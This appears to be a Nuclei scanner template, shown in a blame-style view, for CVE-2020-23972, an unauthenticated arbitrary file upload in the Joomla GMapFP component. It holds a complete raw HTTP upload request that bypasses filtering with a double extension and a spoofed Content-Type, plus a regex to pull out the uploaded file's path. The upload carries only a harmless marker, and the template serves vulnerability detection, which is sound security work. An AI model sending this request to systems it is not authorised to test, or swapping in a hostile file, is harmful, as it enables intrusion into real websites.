2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-23972
|
2020-12-01 09:25:33 +00:00
|
|
|
|
|
|
|
|
info:
|
|
|
|
|
name: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
|
|
|
|
|
author: dwisiswant0
|
|
|
|
|
severity: high
|
|
|
|
|
description: |
|
|
|
|
|
An attacker can access the upload function of the application
|
|
|
|
|
without authenticating to the application and also can upload
|
|
|
|
|
files due the issues of unrestricted file upload which can be
|
|
|
|
|
bypassed by changing Content-Type & name file too double ext.
|
|
|
|
|
|
|
|
|
|
# Source: https://www.exploit-db.com/exploits/49129
|
|
|
|
|
|
|
|
|
|
requests:
|
|
|
|
|
- payloads:
|
|
|
|
|
component:
|
|
|
|
|
- "com_gmapfp"
|
|
|
|
|
- "comgmapfp"
|
|
|
|
|
raw:
|
|
|
|
|
- |
|
|
|
|
|
POST /index.php?option=§component§&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
|
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
|
|
|
Referer: {{BaseURL}}
|
|
|
|
|
Connection: close
|
|
|
|
|
|
|
|
|
|
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
|
|
|
|
Content-Disposition: form-data; name="option"
|
|
|
|
|
|
|
|
|
|
com_gmapfp
|
|
|
|
|
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
|
|
|
|
Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif"
|
|
|
|
|
Content-Type: text/html
|
|
|
|
|
|
|
|
|
|
projectdiscovery
|
|
|
|
|
|
|
|
|
|
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
|
|
|
|
Content-Disposition: form-data; name="no_html"
|
|
|
|
|
|
|
|
|
|
no_html
|
|
|
|
|
------WebKitFormBoundarySHHbUsfCoxlX1bpS--
|
|
|
|
|
extractors:
|
|
|
|
|
- type: regex
|
|
|
|
|
part: body
|
|
|
|
|
regex:
|
|
|
|
|
- "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
|
